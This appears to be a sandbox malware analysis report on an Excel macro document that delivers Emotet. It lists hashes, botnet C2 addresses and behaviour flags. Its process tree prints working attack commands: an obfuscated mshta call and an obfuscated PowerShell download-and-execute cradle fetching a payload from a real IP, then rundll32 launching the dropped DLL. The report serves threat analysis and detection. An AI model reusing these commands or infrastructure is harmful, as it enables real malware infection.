Analysis

  • max time kernel
    150s
  • max time network
    135s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    20-01-2022 06:03

General

  • Target

    bf154edb1260fa98f30bb6201ed8abd72a55e51938f300f504e164aea6a40603.xlsm

  • Size

    115KB

  • MD5

    cb5ae08f0635dff32c684570750108b5

  • SHA1

    33c65f18d7f753d82cb4ac73540d5e53acb61d5f

  • SHA256

    bf154edb1260fa98f30bb6201ed8abd72a55e51938f300f504e164aea6a40603

  • SHA512

    4728bc8629c0584e23d02d4705ce607c6dd76740f4b64b089c8df5dc30f3fd3bec6d6dd4e39ab0bddb4da4fad6bc184496f580232555f74148db38455084f564

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0x5cff39c3/sec/se1.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://92.255.57.195/sec/se1.png

Extracted

Family

emotet

Botnet

Epoch5

C2

45.138.98.34:80

69.16.218.101:8080

51.210.242.234:8080

185.148.168.220:8080

142.4.219.173:8080

54.38.242.185:443

191.252.103.16:80

104.131.62.48:8080

62.171.178.147:8080

217.182.143.207:443

168.197.250.14:80

37.44.244.177:8080

66.42.57.149:443

210.57.209.142:8080

159.69.237.188:443

116.124.128.206:8080

128.199.192.135:8080

195.154.146.35:443

185.148.168.15:8080

195.77.239.39:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 20 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\bf154edb1260fa98f30bb6201ed8abd72a55e51938f300f504e164aea6a40603.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3436
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3052
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.html
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2440
        • C:\Windows\system32\mshta.exe
          mshta http://0x5cff39c3/sec/se1.html
          3⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:2908
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 2908 -s 1652
            4⤵
            • Program crash
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3732
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/se1.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2436
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2560
              • C:\Windows\SysWow64\rundll32.exe
                C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
                6⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:2152
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                  7⤵
                  • Loads dropped DLL
                  • Drops file in System32 directory
                  • Suspicious use of WriteProcessMemory
                  PID:1320
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gikrnziowcvwp\jevmpfqpzvlu.bga",oMWUzKqQrQE
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2304
                    • C:\Windows\SysWOW64\rundll32.exe
                      C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Gikrnziowcvwp\jevmpfqpzvlu.bga",DllRegisterServer
                      9⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3376

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    System Information Discovery

    3
    T1082

    Query Registry

    2
    T1012

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Public\Documents\ssd.dll
      MD5

      c3eaaaf3b9ab5b846ac2de7a7bd8da52

      SHA1

      625005ca187b9d7702039410e56056194e8842f2

      SHA256

      a4e8664586a83c73088d7d4378a124d1cab2219a19ce8a4220d2fb4265bf77e1

      SHA512

      a53663373caad66e3501ab29f845a8d5b3535270f2d059417419cb47c90c0ade2b62c019a5c21c4dc2046a729e833647d9a18be1f95d5527e32c7f39f5f790fc

    • \Users\Public\Documents\ssd.dll
      MD5

      c3eaaaf3b9ab5b846ac2de7a7bd8da52

      SHA1

      625005ca187b9d7702039410e56056194e8842f2

      SHA256

      a4e8664586a83c73088d7d4378a124d1cab2219a19ce8a4220d2fb4265bf77e1

      SHA512

      a53663373caad66e3501ab29f845a8d5b3535270f2d059417419cb47c90c0ade2b62c019a5c21c4dc2046a729e833647d9a18be1f95d5527e32c7f39f5f790fc

    • \Users\Public\Documents\ssd.dll
      MD5

      c3eaaaf3b9ab5b846ac2de7a7bd8da52

      SHA1

      625005ca187b9d7702039410e56056194e8842f2

      SHA256

      a4e8664586a83c73088d7d4378a124d1cab2219a19ce8a4220d2fb4265bf77e1

      SHA512

      a53663373caad66e3501ab29f845a8d5b3535270f2d059417419cb47c90c0ade2b62c019a5c21c4dc2046a729e833647d9a18be1f95d5527e32c7f39f5f790fc

    • memory/1320-829-0x0000000005470000-0x0000000005498000-memory.dmp
      Filesize

      160KB

    • memory/1320-825-0x00000000052F0000-0x0000000005318000-memory.dmp
      Filesize

      160KB

    • memory/1320-823-0x0000000005290000-0x00000000052B8000-memory.dmp
      Filesize

      160KB

    • memory/1320-821-0x0000000005190000-0x00000000051B8000-memory.dmp
      Filesize

      160KB

    • memory/1320-819-0x0000000005080000-0x00000000050A8000-memory.dmp
      Filesize

      160KB

    • memory/1320-816-0x0000000004A70000-0x0000000004A98000-memory.dmp
      Filesize

      160KB

    • memory/2152-813-0x00000000011D0000-0x00000000011F8000-memory.dmp
      Filesize

      160KB

    • memory/2304-827-0x0000000001180000-0x00000000011A8000-memory.dmp
      Filesize

      160KB

    • memory/2436-740-0x0000019FF65B6000-0x0000019FF65B8000-memory.dmp
      Filesize

      8KB

    • memory/2436-588-0x0000019FF6D30000-0x0000019FF6DA6000-memory.dmp
      Filesize

      472KB

    • memory/2436-553-0x0000019FF6600000-0x0000019FF663C000-memory.dmp
      Filesize

      240KB

    • memory/2436-511-0x0000019FF65B3000-0x0000019FF65B5000-memory.dmp
      Filesize

      8KB

    • memory/2436-510-0x0000019FF65B0000-0x0000019FF65B2000-memory.dmp
      Filesize

      8KB

    • memory/2436-506-0x0000019FF6540000-0x0000019FF6562000-memory.dmp
      Filesize

      136KB

    • memory/3376-830-0x0000000000F90000-0x0000000000FB8000-memory.dmp
      Filesize

      160KB

    • memory/3376-833-0x0000000004E10000-0x0000000004E38000-memory.dmp
      Filesize

      160KB

    • memory/3436-129-0x00007FFA704F0000-0x00007FFA70500000-memory.dmp
      Filesize

      64KB

    • memory/3436-121-0x00007FFA73860000-0x00007FFA73870000-memory.dmp
      Filesize

      64KB

    • memory/3436-118-0x00007FFA73860000-0x00007FFA73870000-memory.dmp
      Filesize

      64KB

    • memory/3436-117-0x00007FFA73860000-0x00007FFA73870000-memory.dmp
      Filesize

      64KB

    • memory/3436-116-0x00007FFA73860000-0x00007FFA73870000-memory.dmp
      Filesize

      64KB

    • memory/3436-128-0x00007FFA704F0000-0x00007FFA70500000-memory.dmp
      Filesize

      64KB

    • memory/3436-115-0x00007FFA73860000-0x00007FFA73870000-memory.dmp
      Filesize

      64KB